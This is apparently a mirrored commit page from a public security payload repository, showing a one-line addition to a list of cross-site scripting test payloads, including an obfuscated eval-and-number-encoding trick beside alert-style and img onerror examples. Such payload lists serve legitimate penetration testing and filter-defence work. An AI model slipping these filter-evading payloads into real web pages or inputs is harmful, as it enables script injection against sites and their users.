mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings
synced 2025-12-15 21:34:25 +01:00
Update README.md
This commit is contained in:
parent
eddc716d8c
commit
ee12f8e480
1 changed files with 1 additions and 0 deletions
|
|
@ -160,6 +160,7 @@ Most tools are also suitable for blind XSS attacks:
|
|||
"><script>alert(String.fromCharCode(88,83,83))</script>
|
||||
<script>\u0061lert('22')</script>
|
||||
<script>eval('\x61lert(\'33\')')</script>
|
||||
<script>eval(8680439..toString(30))(983801..toString(36))</script> //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm"
|
||||
|
||||
// Img payload
|
||||
<img src=x onerror=alert('XSS');>
|
||||
|
|
|
|||
Loading…
Reference in a new issue